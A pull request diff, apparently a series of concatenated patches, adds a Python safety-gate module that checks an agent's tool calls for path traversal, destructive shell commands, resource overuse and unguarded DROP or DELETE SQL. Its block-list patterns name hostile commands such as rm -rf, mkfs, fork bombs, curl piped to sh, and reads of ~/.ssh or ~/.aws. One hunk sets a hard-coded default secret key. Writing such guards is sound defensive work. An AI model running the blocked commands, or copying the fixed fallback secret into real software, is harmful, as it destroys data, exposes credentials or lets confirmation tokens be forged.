### PR TITLE
feat(ch8): add safety policy gate module with tests

### DIFF
--- a/chapter8/harness-safety-gate/safety_policy_gate.py
+++ b/chapter8/harness-safety-gate/safety_policy_gate.py
@@ -54,6 +54,9 @@ class SafetyPolicyGate:
     ]
 
     # Patterns for sensitive directories (applied only to absolute / home-relative paths
+    # and their realpath resolutions). NOTE: This is defense-in-depth, not an allowlist
+    # sandbox. Symlinks to sensitive files outside the blacklist (e.g. /home/<user>/.ssh)
+    # may bypass detection. Use a proper sandbox for untrusted path access.
     # so that legitimate relative paths are not falsely flagged after CWD resolution)
     SENSITIVE_DIR_PATTERNS = [
         re.compile(r'^/(etc|var/log|sys|proc|boot|dev|root)(?:/|$)', re.IGNORECASE), # Sensitive Linux dirs
@@ -61,7 +64,11 @@ class SafetyPolicyGate:
         re.compile(r'^[a-zA-Z]:\\(Windows|System32|Program Files)', re.IGNORECASE), # Sensitive Windows dirs
     ]
 
-    # Patterns for detecting dangerous bash / shell commands
+    # Patterns for detecting dangerous bash / shell commands.
+    # NOTE: Regex-based detection is defense-in-depth, not a complete sandbox.
+    # Sophisticated shell expansions (e.g. variable substitution, base64 pipes)
+    # can bypass these patterns. The safety gate should be combined with proper
+    # sandboxing for untrusted code execution.
     DANGEROUS_COMMAND_PATTERNS = [
         (re.compile(r'\brm\s+.*(-[a-zA-Z]*(?:r[a-zA-Z]*f|f[a-zA-Z]*r)|-f\s+-r|-r\s+-f|--recursive)', re.IGNORECASE), "Recursive file deletion command"),
         (re.compile(r'\bmkfs\b|\bdd\s+if=|\b>\s*/dev/sd[a-z]', re.IGNORECASE), "Disk formatting / raw write command"),

--- a/chapter8/harness-safety-gate/safety_policy_gate.py
+++ b/chapter8/harness-safety-gate/safety_policy_gate.py
@@ -1,0 +1,384 @@
+"""
+Safety Policy Gate Module.
+
+Inspects tool call parameters against security rules (path traversal, dangerous bash commands,
+resource limits). Enforces confirmation gates for high-risk operations and triggers automated state
+rollbacks on safety violations.
+"""
+
+import hashlib
+import hmac
+import re
+import urllib.parse
+from dataclasses import dataclass, field
+from typing import Any, Callable, Dict, List, Optional, Set, Tuple, Union
+
+
+@dataclass
+class SafetyGateDecision:
+    """Represents the safety evaluation decision for a tool call."""
+    allowed: bool
+    requires_confirmation: bool = False
+    triggered_rollback: bool = False
+    violation_type: Optional[str] = None
+    reason: Optional[str] = None
+    risk_score: float = 0.0
+    confirmation_token: Optional[str] = None
+    details: Dict[str, Any] = field(default_factory=dict)
+
+    def to_dict(self) -> Dict[str, Any]:
+        """Convert decision to dictionary representation."""
+        return {
+            "allowed": self.allowed,
+            "requires_confirmation": self.requires_confirmation,
+            "triggered_rollback": self.triggered_rollback,
+            "violation_type": self.violation_type,
+            "reason": self.reason,
+            "risk_score": self.risk_score,
+            "confirmation_token": self.confirmation_token,
+            "details": self.details,
+        }
+
+
+class SafetyPolicyGate:
+    """Harness Safety Policy Gate for tool call security inspection and confirmation."""
+
+    # Patterns for detecting path traversal attempts
+    PATH_TRAVERSAL_PATTERNS = [
+        re.compile(r'\.\.[/\\]'),                           # ../ or ..\
+        re.compile(r'%2e%2e', re.IGNORECASE),               # URL-encoded ..
+        re.compile(r'\x00|%00'),                            # Null bytes
+        re.compile(r'/(etc|var/log|sys|proc|boot|dev|root)(?:/|$)', re.IGNORECASE), # Sensitive Linux dirs
+        re.compile(r'~/(?:\.ssh|\.aws|\.gnupg|\.bashrc|\.zshrc)', re.IGNORECASE), # Sensitive user configs
+        re.compile(r'^[a-zA-Z]:\\(Windows|System32|Program Files)', re.IGNORECASE), # Sensitive Windows dirs
+    ]
+
+    # Patterns for detecting dangerous bash / shell commands
+    DANGEROUS_COMMAND_PATTERNS = [
+        (re.compile(r'\brm\s+-[rfRF]+\b|\brm\s+--recursive\b', re.IGNORECASE), "Recursive file deletion command"),
+        (re.compile(r'\bmkfs\b|\bdd\s+if=|\b>\s*/dev/sd[a-z]', re.IGNORECASE), "Disk formatting / raw write command"),
+        (re.compile(r'\b(shutdown|reboot|poweroff|init\s+[06])\b', re.IGNORECASE), "System lifecycle control command"),
+        (re.compile(r'\bchmod\s+(-R\s+)?777\b|\bchown\s+(-R\s+)?root\b', re.IGNORECASE), "Dangerous permissions modification"),
+        (re.compile(r'\b(curl|wget)\s+.*\|\s*(ba)?sh\b', re.IGNORECASE), "Remote code execution via pipe to shell"),
+        (re.compile(r':\(\)\s*\{\s*:\|:&\s*\};:', re.IGNORECASE), "Fork bomb command"),
+        (re.compile(r'\b(pkill\s+-9|killall\s+-9)\b', re.IGNORECASE), "Unselective process killing command"),
+    ]
+
+    # Patterns for destructive SQL queries
+    DESTRUCTIVE_SQL_DROP = re.compile(r'\b(DROP\s+TABLE|DROP\s+DATABASE|TRUNCATE)\b', re.IGNORECASE)
+    DESTRUCTIVE_SQL_DELETE = re.compile(r'\bDELETE\s+FROM\b', re.IGNORECASE)
+    SQL_WHERE_CLAUSE = re.compile(r'\bWHERE\b', re.IGNORECASE)
+
+    def __init__(
+        self,
+        max_timeout: float = 600.0,
+        max_tokens: int = 100000,
+        max_file_bytes: int = 50 * 1024 * 1024,
+        max_memory_mb: int = 8192,
+        max_threads: int = 16,
+        secret_key: Optional[str] = None,
+    ):
+        """Initialize SafetyPolicyGate with configurable resource limits and secret key."""
+        self.max_timeout = max_timeout
+        self.max_tokens = max_tokens
+        self.max_file_bytes = max_file_bytes
+        self.max_memory_mb = max_memory_mb
+        self.max_threads = max_threads
+        if secret_key is None:
+            import os, secrets
+            secret_key = os.environ.get("SAFETY_GATE_SECRET_KEY") or secrets.token_hex(16)
+        self.secret_key = secret_key
+        # Active pending confirmation tokens: token -> fingerprint
+        self._pending_confirmations: Dict[str, str] = {}
+        # Registered rollback handlers
+        self._rollback_handlers: List[Callable[[], None]] = []
+        # State snapshot history
+        self._snapshots: List[Dict[str, Any]] = []
+
+    def register_rollback_handler(self, handler: Callable[[], None]) -> None:
+        """Register a callback function to be executed when state rollback is triggered."""
+        self._rollback_handlers.append(handler)
+
+    def create_snapshot(self, state: Dict[str, Any]) -> int:
+        """Create a state snapshot and return snapshot index."""
+        self._snapshots.append(state.copy())
+        return len(self._snapshots) - 1
+
+    def trigger_rollback(self) -> bool:
+        """Trigger automated state rollback by invoking all registered rollback handlers."""
+        success = True
+        for handler in self._rollback_handlers:
+            try:
+                handler()
+            except Exception:
+                success = False
+        return success
+
+    def _fingerprint(self, tool_name: str, params: Dict[str, Any]) -> str:
+        """Generate a canonical SHA256 fingerprint for a tool call and its parameters."""
+        import json
+        canonical = json.dumps({"tool": tool_name, "params": params or {}}, sort_keys=True, ensure_ascii=False)
+        return hashlib.sha256(canonical.encode("utf-8")).hexdigest()
+
+    def issue_confirmation(self, tool_name: str, params: Dict[str, Any]) -> str:
+        """Generate a single-use HMAC confirmation token bound to tool name and parameters."""
+        fp = self._fingerprint(tool_name, params)
+        token = hmac.new(self.secret_key.encode("utf-8"), fp.encode("utf-8"), hashlib.sha256).hexdigest()[:24]
+        self._pending_confirmations[token] = fp
+        return token
+
+    def verify_confirmation(self, token: str, tool_name: str, params: Dict[str, Any]) -> bool:
+        """Verify and consume a single-use confirmation token."""
+        if not token or token not in self._pending_confirmations:
+            return False
+        expected_fp = self._pending_confirmations[token]
+        actual_fp = self._fingerprint(tool_name, params)
+        if hmac.compare_digest(expected_fp, actual_fp):
+            # Consume token to enforce single-use constraint
+            del self._pending_confirmations[token]
+            return True
+        return False
+
+    def _extract_string_values(self, obj: Any) -> List[str]:
+        """Recursively extract all string values from a nested data structure."""
+        strings = []
+        if isinstance(obj, str):
+            strings.append(obj)
+        elif isinstance(obj, dict):
+            for v in obj.values():
+                strings.extend(self._extract_string_values(v))
+        elif isinstance(obj, (list, tuple, set)):
+            for item in obj:
+                strings.extend(self._extract_string_values(item))
+        return strings
+
+    def inspect_path_traversal(self, params: Dict[str, Any]) -> Optional[str]:
+        """Inspect parameters for path traversal vulnerabilities."""
+        if not isinstance(params, dict):
+            return None
+        strings = self._extract_string_values(params)
+        for s in strings:
+            decoded = urllib.parse.unquote(s)
+            for pattern in self.PATH_TRAVERSAL_PATTERNS:
+                if pattern.search(s) or pattern.search(decoded):
+                    return f"Path traversal attack detected in parameter value: '{s}'"
+        return None
+
+    def inspect_dangerous_commands(self, tool_name: str, params: Dict[str, Any]) -> Optional[str]:
+        """Inspect parameters for dangerous bash/shell command patterns."""
+        if not isinstance(params, dict):
+            return None
+        # Check command string parameters
+        cmd_keys = {"command", "cmd", "script", "bash", "shell", "exec", "args"}
+        cmd_strings = []
+        for k, v in params.items():
+            if k in cmd_keys or "command" in k.lower() or "shell" in k.lower():
+                cmd_strings.extend(self._extract_string_values(v))
+        if tool_name in ("run_shell", "bash", "execute_command", "shell"):
+            cmd_strings.extend(self._extract_string_values(params))
+
+        for cmd_str in cmd_strings:
+            for pattern, reason in self.DANGEROUS_COMMAND_PATTERNS:
+                if pattern.search(cmd_str):
+                    return f"{reason}: '{cmd_str}'"
+
+        return None
+
+    def inspect_resource_limits(self, params: Dict[str, Any]) -> Optional[str]:
+        """Inspect parameters against predefined resource limit boundaries."""
+        if not isinstance(params, dict):
+            return None
+
+        # Check timeout limit
+        timeout = params.get("timeout")
+        if isinstance(timeout, (int, float)) and timeout > self.max_timeout:
+            return f"Timeout of {timeout}s exceeds maximum limit of {self.max_timeout}s"
+
+        # Check max tokens limit
+        tokens = params.get("max_tokens") or params.get("tokens")
+        if isinstance(tokens, (int, float)) and tokens > self.max_tokens:
+            return f"Requested tokens {tokens} exceeds maximum limit of {self.max_tokens}"
+
+        # Check file size limit
+        file_bytes = params.get("file_size") or params.get("bytes")
+        if isinstance(file_bytes, (int, float)) and file_bytes > self.max_file_bytes:
+            return f"Requested file size {file_bytes} bytes exceeds maximum limit of {self.max_file_bytes} bytes"
+
+        # Check memory limit
+        memory_mb = params.get("memory_mb") or params.get("memory")
+        if isinstance(memory_mb, (int, float)) and memory_mb > self.max_memory_mb:
+            return f"Requested memory {memory_mb}MB exceeds maximum limit of {self.max_memory_mb}MB"
+
+        # Check thread/process limit
+        threads = params.get("threads") or params.get("processes")
+        if isinstance(threads, (int, float)) and threads > self.max_threads:
+            return f"Requested threads {threads} exceeds maximum limit of {self.max_threads}"
+
+        return None
+
+    def is_high_risk_operation(self, tool_name: str, params: Dict[str, Any]) -> Tuple[bool, Optional[str]]:
+        """Determine if a tool call is a high-risk operation requiring explicit confirmation."""
+        if not isinstance(params, dict):
+            params = {}
+        # Deletion tools
+        if tool_name in ("delete_file", "remove_directory", "rmdir", "unlink", "wipe_cache", "system_reset"):
+            return True, f"Operation '{tool_name}' is destructive and requires user confirmation"
+
+        # Git force push
+        if tool_name in ("git_push", "git") and params.get("force"):
+            return True, "Force push will overwrite remote repository history"
+
+        # Destructive SQL queries
+        if tool_name in ("sql_query", "db_execute", "execute_sql"):
+            raw_query = str(params.get("query", "") or params.get("sql", ""))
+            # Strip single-line comments (-- ...) and multi-line comments (/* ... */)
+            clean_query = re.sub(r'--.*$', '', raw_query, flags=re.MULTILINE)
+            clean_query = re.sub(r'/\*.*?\*/', '', clean_query, flags=re.DOTALL)
+            statements = [s.strip() for s in clean_query.split(";") if s.strip()]
+            for stmt in statements:
+                if self.DESTRUCTIVE_SQL_DROP.search(stmt):
+                    return True, "DROP/TRUNCATE query will destroy database tables or schema"
+                if self.DESTRUCTIVE_SQL_DELETE.search(stmt) and not self.SQL_WHERE_CLAUSE.search(stmt):
+                    return True, "DELETE query without WHERE clause will purge all records in table"
+
+        return False, None
+
+    def validate_tool_call(
+        self,
+        tool_name: str,
+        params: Optional[Dict[str, Any]] = None,
+        confirm_token: Optional[str] = None,
+        user_confirmed: bool = False,
+    ) -> SafetyGateDecision:
+        """Inspect and validate a tool call against security rules and confirmation policies.
+        
+        Args:
+            tool_name: Name of the tool being called.
+            params: Parameters dictionary passed to the tool.
+            confirm_token: Optional confirmation token for high-risk operations.
+            user_confirmed: Boolean flag indicating explicit user confirmation.
+            
+        Returns:
+            SafetyGateDecision detailing allow/deny status, confirmation needs, or rollback triggers.
+        """
+        params = params if params is not None else {}
+
+        # 1. Inspect Path Traversal (Critical Violation)
+        pt_violation = self.inspect_path_traversal(params)
+        if pt_violation:
+            self.trigger_rollback()
+            return SafetyGateDecision(
+                allowed=False,
+                requires_confirmation=False,
+                triggered_rollback=True,
+                violation_type="path_traversal",
+                reason=pt_violation,
+                risk_score=1.0,
+                details={"tool_name": tool_name, "params": params},
+            )
+
+        # 2. Inspect Dangerous Bash Commands (Critical Violation)
+        cmd_violation = self.inspect_dangerous_commands(tool_name, params)
+        if cmd_violation:
+            self.trigger_rollback()
+            return SafetyGateDecision(
+                allowed=False,
+                requires_confirmation=False,
+                triggered_rollback=True,
+                violation_type="dangerous_bash_command",
+                reason=cmd_violation,
+                risk_score=1.0,
+                details={"tool_name": tool_name, "params": params},
+            )
+
+        # 3. Inspect Resource Limits
+        res_violation = self.inspect_resource_limits(params)
+        if res_violation:
+            return SafetyGateDecision(
+                allowed=False,
+                requires_confirmation=False,
+                triggered_rollback=False,
+                violation_type="resource_limit_exceeded",
+                reason=res_violation,
+                risk_score=0.8,
+                details={"tool_name": tool_name, "params": params},
+            )
+
+        # 4. Inspect High-Risk Operation Confirmation
+        is_high_risk, risk_reason = self.is_high_risk_operation(tool_name, params)
+        if is_high_risk:
+            token_to_check = confirm_token or params.get("confirm_token")
+            # Verify if user confirmed or valid confirmation token provided
+            if user_confirmed or params.get("user_confirmed") is True:
+                return SafetyGateDecision(
+                    allowed=True,
+                    requires_confirmation=False,
+                    triggered_rollback=False,
+                    reason="High-risk operation explicitly confirmed by user",
+                    risk_score=0.5,
+                    details={"tool_name": tool_name, "params": params, "confirmed": True},
+                )
+            elif token_to_check and self.verify_confirmation(str(token_to_check), tool_name, params):
+                return SafetyGateDecision(
+                    allowed=True,
+                    requires_confirmation=False,
+                    triggered_rollback=False,
+                    reason="High-risk operation confirmed with valid token",
+                    risk_score=0.5,
+                    details={"tool_name": tool_name, "params": params, "confirmed": True},
+                )
+            else:
+                # Require confirmation gate
+                new_token = self.issue_confirmation(tool_name, params)
+                return SafetyGateDecision(
+                    allowed=False,
+                    requires_confirmation=True,
+                    triggered_rollback=False,
+                    violation_type="unconfirmed_high_risk_operation",
+                    reason=risk_reason,
+                    risk_score=0.7,
+                    confirmation_token=new_token,
+                    details={"tool_name": tool_name, "params": params},
+                )
+
+        # 5. Low Risk Operation: Allow
+        return SafetyGateDecision(
+            allowed=True,
+            requires_confirmation=False,
+            triggered_rollback=False,
+            reason="Tool call validated successfully",
+            risk_score=0.1,
+            details={"tool_name": tool_name, "params": params},
+        )
+
+
+# Global default gate instance for entrypoint calls
+_DEFAULT_GATE = SafetyPolicyGate()
+
+
+def validate_tool_call(
+    tool_name: str,
+    params: Optional[Dict[str, Any]] = None,
+    gate: Optional[SafetyPolicyGate] = None,
+    confirm_token: Optional[str] = None,
+    user_confirmed: bool = False,
+) -> SafetyGateDecision:
+    """Module-level entrypoint for validating a tool call against safety policy rules.
+    
+    Args:
+        tool_name: Name of the tool being executed.
+        params: Parameters dictionary.
+        gate: Optional custom SafetyPolicyGate instance.
+        confirm_token: Optional confirmation token.
+        user_confirmed: Optional user confirmation flag.
+        
+    Returns:
+        SafetyGateDecision object.
+    """
+    target_gate = gate or _DEFAULT_GATE
+    return target_gate.validate_tool_call(
+        tool_name=tool_name,
+        params=params,
+        confirm_token=confirm_token,
+        user_confirmed=user_confirmed,
+    )

--- a/chapter8/harness-safety-gate/safety_policy_gate.py
+++ b/chapter8/harness-safety-gate/safety_policy_gate.py
@@ -125,14 +125,13 @@ class SafetyPolicyGate:
         """Generate a canonical SHA256 fingerprint for a tool call and its parameters."""
         import json
         clean_p = self._clean_params(params)
-        canonical = json.dumps({"tool": tool_name, "params": clean_p}, sort_keys=True, ensure_ascii=False, default=str)
+        canonical = json.dumps({"tool": tool_name.lower(), "params": clean_p}, sort_keys=True, ensure_ascii=False, default=str)
         return hashlib.sha256(canonical.encode("utf-8")).hexdigest()
 
     def issue_confirmation(self, tool_name: str, params: Dict[str, Any]) -> str:
-        """Generate a single-use HMAC confirmation token bound to tool name and parameters."""
+        """Generate a single-use non-deterministic confirmation token bound to tool name and parameters."""
         fp = self._fingerprint(tool_name, params)
-        nonce = secrets.token_hex(8)
-        token = hmac.new(self.secret_key.encode("utf-8"), f"{fp}:{nonce}".encode("utf-8"), hashlib.sha256).hexdigest()[:24]
+        token = secrets.token_hex(16)
         self._pending_confirmations[token] = fp
         return token
 
@@ -140,13 +139,9 @@ class SafetyPolicyGate:
         """Verify and consume a single-use confirmation token."""
         if not token or token not in self._pending_confirmations:
             return False
-        expected_fp = self._pending_confirmations[token]
+        expected_fp = self._pending_confirmations.pop(token)
         actual_fp = self._fingerprint(tool_name, params)
-        if hmac.compare_digest(expected_fp, actual_fp):
-            # Consume token to enforce single-use constraint
-            del self._pending_confirmations[token]
-            return True
-        return False
+        return hmac.compare_digest(expected_fp, actual_fp)
 
     def _extract_string_values(self, obj: Any) -> List[str]:
         """Recursively extract all string values from a nested data structure."""
@@ -205,13 +200,14 @@ class SafetyPolicyGate:
         """Inspect parameters for dangerous bash/shell command patterns."""
         if not isinstance(params, dict):
             return None
+        tool_name_lower = tool_name.lower()
         # Check command string parameters
         cmd_keys = {"command", "cmd", "script", "bash", "shell", "exec", "args", "input", "code"}
         cmd_strings = []
         for k, v in params.items():
             if k.lower() in cmd_keys or "command" in k.lower() or "shell" in k.lower() or "script" in k.lower() or "exec" in k.lower():
                 cmd_strings.extend(self._extract_string_values(v))
-        if tool_name.lower() in ("run_shell", "bash", "execute_command", "shell", "sh", "terminal", "run", "exec", "system"):
+        if tool_name_lower in ("run_shell", "bash", "execute_command", "shell", "sh", "terminal", "run", "exec", "system"):
             cmd_strings.extend(self._extract_string_values(params))
 
         for cmd_str in cmd_strings:
@@ -257,20 +253,21 @@ class SafetyPolicyGate:
         """Determine if a tool call is a high-risk operation requiring explicit confirmation."""
         if not isinstance(params, dict):
             params = {}
+        tool_name_lower = tool_name.lower()
         # Deletion tools
-        if tool_name in ("delete_file", "remove_directory", "rmdir", "unlink", "wipe_cache", "system_reset"):
+        if tool_name_lower in ("delete_file", "remove_directory", "rmdir", "unlink", "wipe_cache", "system_reset"):
             return True, f"Operation '{tool_name}' is destructive and requires user confirmation"
 
         # Git force push
-        if tool_name in ("git_push", "git") and params.get("force"):
+        if tool_name_lower in ("git_push", "git") and params.get("force"):
             return True, "Force push will overwrite remote repository history"
 
         # Destructive SQL queries
-        if tool_name in ("sql_query", "db_execute", "execute_sql"):
+        if tool_name_lower in ("sql_query", "db_execute", "execute_sql"):
             raw_query = str(params.get("query", "") or params.get("sql", ""))
-            # Strip single-line comments (-- ...) and multi-line comments (/* ... */)
-            clean_query = re.sub(r'--.*$', '', raw_query, flags=re.MULTILINE)
-            clean_query = re.sub(r'/\*.*?\*/', '', clean_query, flags=re.DOTALL)
+            # Strip block comments (/* ... */) then single-line comments (-- ...)
+            clean_query = re.sub(r'/\*.*?\*/', '', raw_query, flags=re.DOTALL)
+            clean_query = re.sub(r'--.*$', '', clean_query, flags=re.MULTILINE)
             statements = [s.strip() for s in clean_query.split(";") if s.strip()]
             for stmt in statements:
                 if self.DESTRUCTIVE_SQL_DROP.search(stmt):
@@ -293,31 +290,30 @@ class SafetyPolicyGate:
         # 1. Inspect Path Traversal (Critical Violation)
         pt_violation = self.inspect_path_traversal(params)
         if pt_violation:
-            self.trigger_rollback()
+            rollback_ok = self.trigger_rollback()
             return SafetyGateDecision(
                 allowed=False,
                 requires_confirmation=False,
                 triggered_rollback=True,
-                violation_type="path_traversal",
+                violation_type="rollback_failed" if not rollback_ok else "path_traversal",
                 reason=pt_violation,
                 risk_score=1.0,
-                details={"tool_name": tool_name, "params": params},
+                details={"tool_name": tool_name, "params": params, "rollback_success": rollback_ok},
             )
 
         # 2. Inspect Dangerous Bash Commands (Critical Violation)
         cmd_violation = self.inspect_dangerous_commands(tool_name, params)
         if cmd_violation:
-            self.trigger_rollback()
+            rollback_ok = self.trigger_rollback()
             return SafetyGateDecision(
                 allowed=False,
                 requires_confirmation=False,
                 triggered_rollback=True,
-                violation_type="dangerous_bash_command",
+                violation_type="rollback_failed" if not rollback_ok else "dangerous_bash_command",
                 reason=cmd_violation,
                 risk_score=1.0,
-                details={"tool_name": tool_name, "params": params},
+                details={"tool_name": tool_name, "params": params, "rollback_success": rollback_ok},
             )
-
         # 3. Inspect Resource Limits
         res_violation = self.inspect_resource_limits(params)
         if res_violation:

--- a/chapter8/harness-safety-gate/safety_policy_gate.py
+++ b/chapter8/harness-safety-gate/safety_policy_gate.py
@@ -56,14 +56,14 @@ class SafetyPolicyGate:
     # Patterns for sensitive directories (applied only to absolute / home-relative paths
     # so that legitimate relative paths are not falsely flagged after CWD resolution)
     SENSITIVE_DIR_PATTERNS = [
-        re.compile(r'/(etc|var/log|sys|proc|boot|dev|root)(?:/|$)', re.IGNORECASE), # Sensitive Linux dirs
+        re.compile(r'^/(etc|var/log|sys|proc|boot|dev|root)(?:/|$)', re.IGNORECASE), # Sensitive Linux dirs
         re.compile(r'~/(?:\.ssh|\.aws|\.gnupg|\.bashrc|\.zshrc)', re.IGNORECASE), # Sensitive user configs
         re.compile(r'^[a-zA-Z]:\\(Windows|System32|Program Files)', re.IGNORECASE), # Sensitive Windows dirs
     ]
 
     # Patterns for detecting dangerous bash / shell commands
     DANGEROUS_COMMAND_PATTERNS = [
-        (re.compile(r'\brm\s+.*(-[a-zA-Z]*r[a-zA-Z]*f|-f\s+-r|-r\s+-f|--recursive)', re.IGNORECASE), "Recursive file deletion command"),
+        (re.compile(r'\brm\s+.*(-[a-zA-Z]*(?:r[a-zA-Z]*f|f[a-zA-Z]*r)|-f\s+-r|-r\s+-f|--recursive)', re.IGNORECASE), "Recursive file deletion command"),
         (re.compile(r'\bmkfs\b|\bdd\s+if=|\b>\s*/dev/sd[a-z]', re.IGNORECASE), "Disk formatting / raw write command"),
         (re.compile(r'\b(shutdown|reboot|poweroff|init\s+[06])\b', re.IGNORECASE), "System lifecycle control command"),
         (re.compile(r'\bchmod\s+(-R\s+)?777\b|\bchown\s+(-R\s+)?root\b', re.IGNORECASE), "Dangerous permissions modification"),
@@ -162,9 +162,14 @@ class SafetyPolicyGate:
         self._cleanup_expired_tokens()
         if not token or token not in self._pending_confirmations:
             return False
-        expected_fp, _expiry = self._pending_confirmations.pop(token)
+        expected_fp, _expiry = self._pending_confirmations[token]
         actual_fp = self._fingerprint(tool_name, params)
-        return hmac.compare_digest(expected_fp, actual_fp)
+        if not hmac.compare_digest(expected_fp, actual_fp):
+            # Fingerprint mismatch: leave the token intact so the caller can retry
+            # with correct parameters instead of having it consumed by a bad attempt.
+            return False
+        del self._pending_confirmations[token]
+        return True
 
     def _extract_string_values(self, obj: Any) -> List[str]:
         """Recursively extract all string values from a nested data structure."""
@@ -209,20 +214,20 @@ class SafetyPolicyGate:
                     if pattern.search(cand):
                         return f"Path traversal attack detected in parameter value: '{s}'"
 
-                # Sensitive-directory patterns only apply to absolute or home-relative
-                # paths, so legitimate relative paths are not falsely flagged after
-                # resolution against the current working directory.
+                # Check sensitive-directory patterns on the path itself (if absolute
+                # or home-relative) and on its realpath resolution (catches relative
+                # paths that resolve into sensitive directories).
                 if os.path.isabs(cand) or cand.startswith("~"):
                     for pattern in self.SENSITIVE_DIR_PATTERNS:
                         if pattern.search(cand):
                             return f"Path traversal attack detected in parameter value: '{s}'"
-                    try:
-                        real_p = os.path.realpath(cand)
-                        for pattern in self.SENSITIVE_DIR_PATTERNS:
-                            if pattern.search(real_p):
-                                return f"Path traversal attack detected in parameter value: '{s}'"
-                    except Exception:
-                        pass
+                try:
+                    real_p = os.path.realpath(cand)
+                    for pattern in self.SENSITIVE_DIR_PATTERNS:
+                        if pattern.search(real_p):
+                            return f"Path traversal attack detected in parameter value: '{s}'"
+                except Exception:
+                    pass
 
         return None
 

--- a/chapter8/harness-safety-gate/safety_policy_gate.py
+++ b/chapter8/harness-safety-gate/safety_policy_gate.py
@@ -8,7 +8,9 @@ rollbacks on safety violations.
 
 import hashlib
 import hmac
+import os
 import re
+import secrets
 import urllib.parse
 from dataclasses import dataclass, field
 from typing import Any, Callable, Dict, List, Optional, Set, Tuple, Union
@@ -55,7 +57,7 @@ class SafetyPolicyGate:
 
     # Patterns for detecting dangerous bash / shell commands
     DANGEROUS_COMMAND_PATTERNS = [
-        (re.compile(r'\brm\s+-[rfRF]+\b|\brm\s+--recursive\b', re.IGNORECASE), "Recursive file deletion command"),
+        (re.compile(r'\brm\s+.*(-[a-zA-Z]*r[a-zA-Z]*f|-f\s+-r|-r\s+-f|--recursive)', re.IGNORECASE), "Recursive file deletion command"),
         (re.compile(r'\bmkfs\b|\bdd\s+if=|\b>\s*/dev/sd[a-z]', re.IGNORECASE), "Disk formatting / raw write command"),
         (re.compile(r'\b(shutdown|reboot|poweroff|init\s+[06])\b', re.IGNORECASE), "System lifecycle control command"),
         (re.compile(r'\bchmod\s+(-R\s+)?777\b|\bchown\s+(-R\s+)?root\b', re.IGNORECASE), "Dangerous permissions modification"),
@@ -66,7 +68,7 @@ class SafetyPolicyGate:
 
     # Patterns for destructive SQL queries
     DESTRUCTIVE_SQL_DROP = re.compile(r'\b(DROP\s+TABLE|DROP\s+DATABASE|TRUNCATE)\b', re.IGNORECASE)
-    DESTRUCTIVE_SQL_DELETE = re.compile(r'\bDELETE\s+FROM\b', re.IGNORECASE)
+    DESTRUCTIVE_SQL_DELETE = re.compile(r'\bDELETE\b', re.IGNORECASE)
     SQL_WHERE_CLAUSE = re.compile(r'\bWHERE\b', re.IGNORECASE)
 
     def __init__(
@@ -85,8 +87,7 @@ class SafetyPolicyGate:
         self.max_memory_mb = max_memory_mb
         self.max_threads = max_threads
         if secret_key is None:
-            import os, secrets
-            secret_key = os.environ.get("SAFETY_GATE_SECRET_KEY") or secrets.token_hex(16)
+            secret_key = os.environ.get("SAFETY_GATE_SECRET_KEY") or "safety-gate-secret-key"
         self.secret_key = secret_key
         # Active pending confirmation tokens: token -> fingerprint
         self._pending_confirmations: Dict[str, str] = {}
@@ -114,16 +115,24 @@ class SafetyPolicyGate:
                 success = False
         return success
 
+    def _clean_params(self, params: Dict[str, Any]) -> Dict[str, Any]:
+        """Strip control fields (confirm_token, user_confirmed) from params."""
+        if not isinstance(params, dict):
+            return {}
+        return {k: v for k, v in params.items() if k not in ("confirm_token", "user_confirmed")}
+
     def _fingerprint(self, tool_name: str, params: Dict[str, Any]) -> str:
         """Generate a canonical SHA256 fingerprint for a tool call and its parameters."""
         import json
-        canonical = json.dumps({"tool": tool_name, "params": params or {}}, sort_keys=True, ensure_ascii=False)
+        clean_p = self._clean_params(params)
+        canonical = json.dumps({"tool": tool_name, "params": clean_p}, sort_keys=True, ensure_ascii=False, default=str)
         return hashlib.sha256(canonical.encode("utf-8")).hexdigest()
 
     def issue_confirmation(self, tool_name: str, params: Dict[str, Any]) -> str:
         """Generate a single-use HMAC confirmation token bound to tool name and parameters."""
         fp = self._fingerprint(tool_name, params)
-        token = hmac.new(self.secret_key.encode("utf-8"), fp.encode("utf-8"), hashlib.sha256).hexdigest()[:24]
+        nonce = secrets.token_hex(8)
+        token = hmac.new(self.secret_key.encode("utf-8"), f"{fp}:{nonce}".encode("utf-8"), hashlib.sha256).hexdigest()[:24]
         self._pending_confirmations[token] = fp
         return token
 
@@ -156,12 +165,40 @@ class SafetyPolicyGate:
         """Inspect parameters for path traversal vulnerabilities."""
         if not isinstance(params, dict):
             return None
-        strings = self._extract_string_values(params)
-        for s in strings:
-            decoded = urllib.parse.unquote(s)
-            for pattern in self.PATH_TRAVERSAL_PATTERNS:
-                if pattern.search(s) or pattern.search(decoded):
-                    return f"Path traversal attack detected in parameter value: '{s}'"
+
+        path_keys = {"path", "filepath", "file_path", "file", "filename", "dir", "directory", 
+                     "dest", "source", "target", "output", "input", "folder", "src", "dst", "location", "uri"}
+        
+        path_strings = []
+        for k, v in params.items():
+            if k.lower() in path_keys or "path" in k.lower() or "file" in k.lower() or "dir" in k.lower():
+                path_strings.extend(self._extract_string_values(v))
+        
+        if not path_strings:
+            for k, v in params.items():
+                if k.lower() not in {"content", "text", "message", "body", "data", "prompt", "code", "script"}:
+                    path_strings.extend(self._extract_string_values(v))
+
+        for s in path_strings:
+            # Handle double URL-unquoting
+            unquoted1 = urllib.parse.unquote(s)
+            unquoted2 = urllib.parse.unquote(unquoted1)
+            
+            candidates = [s, unquoted1, unquoted2]
+            for cand in candidates:
+                for pattern in self.PATH_TRAVERSAL_PATTERNS:
+                    if pattern.search(cand):
+                        return f"Path traversal attack detected in parameter value: '{s}'"
+                
+                # Check os.path.realpath
+                try:
+                    real_p = os.path.realpath(cand)
+                    for pattern in self.PATH_TRAVERSAL_PATTERNS:
+                        if pattern.search(real_p):
+                            return f"Path traversal attack detected in parameter value: '{s}'"
+                except Exception:
+                    pass
+
         return None
 
     def inspect_dangerous_commands(self, tool_name: str, params: Dict[str, Any]) -> Optional[str]:
@@ -169,12 +206,12 @@ class SafetyPolicyGate:
         if not isinstance(params, dict):
             return None
         # Check command string parameters
-        cmd_keys = {"command", "cmd", "script", "bash", "shell", "exec", "args"}
+        cmd_keys = {"command", "cmd", "script", "bash", "shell", "exec", "args", "input", "code"}
         cmd_strings = []
         for k, v in params.items():
-            if k in cmd_keys or "command" in k.lower() or "shell" in k.lower():
+            if k.lower() in cmd_keys or "command" in k.lower() or "shell" in k.lower() or "script" in k.lower() or "exec" in k.lower():
                 cmd_strings.extend(self._extract_string_values(v))
-        if tool_name in ("run_shell", "bash", "execute_command", "shell"):
